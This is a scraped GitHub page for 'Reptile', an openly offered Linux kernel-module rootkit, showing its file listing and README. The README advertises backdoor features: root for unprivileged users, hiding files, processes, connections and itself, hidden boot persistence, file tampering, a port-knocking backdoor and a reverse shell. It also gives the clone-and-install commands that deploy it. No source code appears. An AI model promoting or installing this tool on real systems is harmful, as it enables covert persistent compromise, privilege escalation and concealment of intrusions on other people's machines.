Skip to content
LKM Linux rootkit
Branch: master
Clone or download
Latest commit 0e562cf Mar 3, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
khook updating KHOOK Mar 4, 2019
parasite_loader fixing parasite makefile Jan 28, 2019
sbin fixing KHOOK and add UDP hide feature Feb 1, 2019
scripts update Jan 16, 2019
Kbuild
Makefile fixing KHOOK and add UDP hide feature Feb 1, 2019
README.md
loader.c
rep_mod.c
setup.sh

README.md

Reptile











Tested on

Debian 9: 4.9.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/UDP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)

Install

apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

Uninstall

./setup.sh remove

Usage

See Wiki to usage details.

Warning

Some functions of this module is based on another rootkits. Please see the references!

References

Thanks

Special thanks to my friend Ilya V. Matveychikov for the KHOOK framework and kmatryoshka loader.

Disclaimer

If you wanna more information, send me an e-mail: f0rb1dd3n@tuta.io

You can’t perform that action at this time.